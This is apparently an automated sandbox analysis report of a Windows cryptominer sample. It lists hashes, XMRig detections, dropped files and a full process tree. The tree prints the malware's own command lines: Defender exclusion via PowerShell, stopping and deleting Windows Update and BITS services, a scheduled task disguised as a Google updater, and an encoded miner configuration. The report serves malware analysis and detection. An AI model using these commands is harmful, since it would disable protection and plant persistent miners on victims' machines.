Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
10-10-2022 07:20
Static task
static1
Behavioral task
behavioral1
Sample
their.exe
Resource
win7-20220812-en
General
-
Target
their.exe
-
Size
4.0MB
-
MD5
8d868a206455746c8d3a2e653d86406e
-
SHA1
85323deccfdd24d8b4a8bcb8ec6d3ed973415f21
-
SHA256
ad2ac8f51fefe49c234155309eb8cc0faa4e1e05b2b30317691950d5f4dd8ea1
-
SHA512
cb80788d0431be41022fea57d8f438eeaec6d058135510b0aa47be5db057b30a8c6be27eb036668b721a8320b98a37ffd4e6af3d81bfa62de43d3155acf71c5b
-
SSDEEP
98304:YzQ7QFYA6K/6gtrUFbwaEXTdwutEoV5pPfl:aQU/6KygyFsawThb
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1212-138-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1212-142-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.exeupdaterload.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts conhost.exe File created C:\Windows\system32\drivers\etc\hosts updaterload.exe -
Executes dropped EXE 1 IoCs
Processes:
updaterload.exepid process 1712 updaterload.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1212-138-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1212-142-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 484 taskeng.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updaterload.exedescription pid process target process PID 1712 set thread context of 1280 1712 updaterload.exe conhost.exe PID 1712 set thread context of 1212 1712 updaterload.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.execmd.execonhost.exeupdaterload.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updaterload.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys updaterload.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1288 sc.exe 868 sc.exe 320 sc.exe 1404 sc.exe 584 sc.exe 912 sc.exe 1220 sc.exe 1980 sc.exe 1184 sc.exe 288 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1132 schtasks.exe 2004 schtasks.exe -
Modifies data under HKEY_USERS 7 IoCs
Processes:
WMIC.execonhost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0cfef8a89dcd801 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
schtasks.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 2004 schtasks.exe 852 powershell.exe 808 powershell.exe 1368 powershell.exe 1628 powershell.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe 1212 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
schtasks.exepowercfg.exesc.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeupdaterload.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 2004 schtasks.exe Token: SeShutdownPrivilege 2020 powercfg.exe Token: SeShutdownPrivilege 320 sc.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeDebugPrivilege 852 powershell.exe Token: SeShutdownPrivilege 1628 powershell.exe Token: SeDebugPrivilege 808 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeShutdownPrivilege 680 powercfg.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeShutdownPrivilege 816 powercfg.exe Token: SeShutdownPrivilege 1824 powercfg.exe Token: SeShutdownPrivilege 1704 powercfg.exe Token: SeDebugPrivilege 1712 updaterload.exe Token: SeAssignPrimaryTokenPrivilege 1592 WMIC.exe Token: SeIncreaseQuotaPrivilege 1592 WMIC.exe Token: SeSecurityPrivilege 1592 WMIC.exe Token: SeTakeOwnershipPrivilege 1592 WMIC.exe Token: SeLoadDriverPrivilege 1592 WMIC.exe Token: SeSystemtimePrivilege 1592 WMIC.exe Token: SeBackupPrivilege 1592 WMIC.exe Token: SeRestorePrivilege 1592 WMIC.exe Token: SeShutdownPrivilege 1592 WMIC.exe Token: SeSystemEnvironmentPrivilege 1592 WMIC.exe Token: SeUndockPrivilege 1592 WMIC.exe Token: SeManageVolumePrivilege 1592 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1592 WMIC.exe Token: SeIncreaseQuotaPrivilege 1592 WMIC.exe Token: SeSecurityPrivilege 1592 WMIC.exe Token: SeTakeOwnershipPrivilege 1592 WMIC.exe Token: SeLoadDriverPrivilege 1592 WMIC.exe Token: SeSystemtimePrivilege 1592 WMIC.exe Token: SeBackupPrivilege 1592 WMIC.exe Token: SeRestorePrivilege 1592 WMIC.exe Token: SeShutdownPrivilege 1592 WMIC.exe Token: SeSystemEnvironmentPrivilege 1592 WMIC.exe Token: SeUndockPrivilege 1592 WMIC.exe Token: SeManageVolumePrivilege 1592 WMIC.exe Token: SeLockMemoryPrivilege 1212 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
their.execonhost.execmd.execmd.exepowershell.exepowershell.exetaskeng.exedescription pid process target process PID 1280 wrote to memory of 2004 1280 their.exe powershell.exe PID 1280 wrote to memory of 2004 1280 their.exe powershell.exe PID 1280 wrote to memory of 2004 1280 their.exe powershell.exe PID 1280 wrote to memory of 1328 1280 conhost.exe cmd.exe PID 1280 wrote to memory of 1328 1280 conhost.exe cmd.exe PID 1280 wrote to memory of 1328 1280 conhost.exe cmd.exe PID 1280 wrote to memory of 1068 1280 conhost.exe cmd.exe PID 1280 wrote to memory of 1068 1280 conhost.exe cmd.exe PID 1280 wrote to memory of 1068 1280 conhost.exe cmd.exe PID 1280 wrote to memory of 852 1280 conhost.exe powershell.exe PID 1280 wrote to memory of 852 1280 conhost.exe powershell.exe PID 1280 wrote to memory of 852 1280 conhost.exe powershell.exe PID 1068 wrote to memory of 2020 1068 cmd.exe powercfg.exe PID 1068 wrote to memory of 2020 1068 cmd.exe powercfg.exe PID 1068 wrote to memory of 2020 1068 cmd.exe powercfg.exe PID 1328 wrote to memory of 1288 1328 cmd.exe sc.exe PID 1328 wrote to memory of 1288 1328 cmd.exe sc.exe PID 1328 wrote to memory of 1288 1328 cmd.exe sc.exe PID 1328 wrote to memory of 584 1328 cmd.exe sc.exe PID 1328 wrote to memory of 584 1328 cmd.exe sc.exe PID 1328 wrote to memory of 584 1328 cmd.exe sc.exe PID 1068 wrote to memory of 320 1068 cmd.exe sc.exe PID 1068 wrote to memory of 320 1068 cmd.exe sc.exe PID 1068 wrote to memory of 320 1068 cmd.exe sc.exe PID 1328 wrote to memory of 912 1328 cmd.exe sc.exe PID 1328 wrote to memory of 912 1328 cmd.exe sc.exe PID 1328 wrote to memory of 912 1328 cmd.exe sc.exe PID 1328 wrote to memory of 868 1328 cmd.exe sc.exe PID 1328 wrote to memory of 868 1328 cmd.exe sc.exe PID 1328 wrote to memory of 868 1328 cmd.exe sc.exe PID 1068 wrote to memory of 1208 1068 cmd.exe powercfg.exe PID 1068 wrote to memory of 1208 1068 cmd.exe powercfg.exe PID 1068 wrote to memory of 1208 1068 cmd.exe powercfg.exe PID 1068 wrote to memory of 1628 1068 cmd.exe powershell.exe PID 1068 wrote to memory of 1628 1068 cmd.exe powershell.exe PID 1068 wrote to memory of 1628 1068 cmd.exe powershell.exe PID 1328 wrote to memory of 1220 1328 cmd.exe sc.exe PID 1328 wrote to memory of 1220 1328 cmd.exe sc.exe PID 1328 wrote to memory of 1220 1328 cmd.exe sc.exe PID 1328 wrote to memory of 1668 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1668 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1668 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1740 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1740 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1740 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1768 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1768 1328 cmd.exe reg.exe PID 1328 wrote to memory of 1768 1328 cmd.exe reg.exe PID 1328 wrote to memory of 524 1328 cmd.exe reg.exe PID 1328 wrote to memory of 524 1328 cmd.exe reg.exe PID 1328 wrote to memory of 524 1328 cmd.exe reg.exe PID 1328 wrote to memory of 816 1328 cmd.exe powercfg.exe PID 1328 wrote to memory of 816 1328 cmd.exe powercfg.exe PID 1328 wrote to memory of 816 1328 cmd.exe powercfg.exe PID 852 wrote to memory of 1132 852 powershell.exe schtasks.exe PID 852 wrote to memory of 1132 852 powershell.exe schtasks.exe PID 852 wrote to memory of 1132 852 powershell.exe schtasks.exe PID 1280 wrote to memory of 808 1280 conhost.exe powershell.exe PID 1280 wrote to memory of 808 1280 conhost.exe powershell.exe PID 1280 wrote to memory of 808 1280 conhost.exe powershell.exe PID 808 wrote to memory of 564 808 powershell.exe conhost.exe PID 808 wrote to memory of 564 808 powershell.exe conhost.exe PID 808 wrote to memory of 564 808 powershell.exe conhost.exe PID 484 wrote to memory of 1712 484 taskeng.exe updaterload.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\their.exe"C:\Users\Admin\AppData\Local\Temp\their.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#xocqwwgcr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskEditor /tr "'C:\Program Files\Google\Chrome\updaterload.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#hhngss#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskEditor" } Else { "C:\Program Files\Google\Chrome\updaterload.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskEditor3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\system32\taskeng.exetaskeng.exe {15CD5328-37FC-4AD2-BF4A-B007E8C8A588} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updaterload.exe"C:\Program Files\Google\Chrome\updaterload.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#xocqwwgcr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskEditor /tr "'C:\Program Files\Google\Chrome\updaterload.exe'"4⤵
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe czjocpdzix3⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe wbddxxhtzvvizkaa 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3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc stop bits1⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f1⤵
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "11721838981685343511201026531011558035451171746382-32152953-880725828-1256815223"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updaterload.exeFilesize
4.0MB
MD50d3ed509cef23128823470fbcdbdf3d9
SHA171adac1753da0c55082417fd59f48c65804d9f45
SHA2562eb898b1ca572c76fe7b085853c14da13879eceeba5918a222e2832c182c50d6
SHA5126b994c3a65c251dd1fe403be09103fc86e8573a6c4ea78c4d76ec7346acd311c89ef5f1ddd85e07ed127ba21975b2202a64349aa7daeb27a307b522b2025bd2c
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5944191fd37c68fb316425b31da1a2ec8
SHA1719819e496b1b6ab2ee5cf1c6f09ee1acdd1105d
SHA25677634c73365e05bf4428d26a4942c37a16daca6460a3436d7e8f8a14f0fefb2c
SHA5124ccb7ebe4d8133b7d8fa7b8bbda90217ce2a482ee272373534ce43bc8cf84223fcc4f1fd90c7457e50ab51e9a5b31cc816f96eb463d0972daa20cb5552d518bd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5944191fd37c68fb316425b31da1a2ec8
SHA1719819e496b1b6ab2ee5cf1c6f09ee1acdd1105d
SHA25677634c73365e05bf4428d26a4942c37a16daca6460a3436d7e8f8a14f0fefb2c
SHA5124ccb7ebe4d8133b7d8fa7b8bbda90217ce2a482ee272373534ce43bc8cf84223fcc4f1fd90c7457e50ab51e9a5b31cc816f96eb463d0972daa20cb5552d518bd
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD542188cf3639d7b443892f641a7c3acbb
SHA11e6df6826c91689e48b902d86c2f6fe017eead2b
SHA2568d295041f208c8c0f1b50dd018fa9fe0ba4c4f9c1fd12e1c1e041389c62e6082
SHA5124def2cd61796b1ecd0db19135c37010366766bda7396a47622c8150b44be3e9e47805b37d760e6dccb0ce2de8143f0b5457ff4c02e857017a45a1782bfc1da12
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
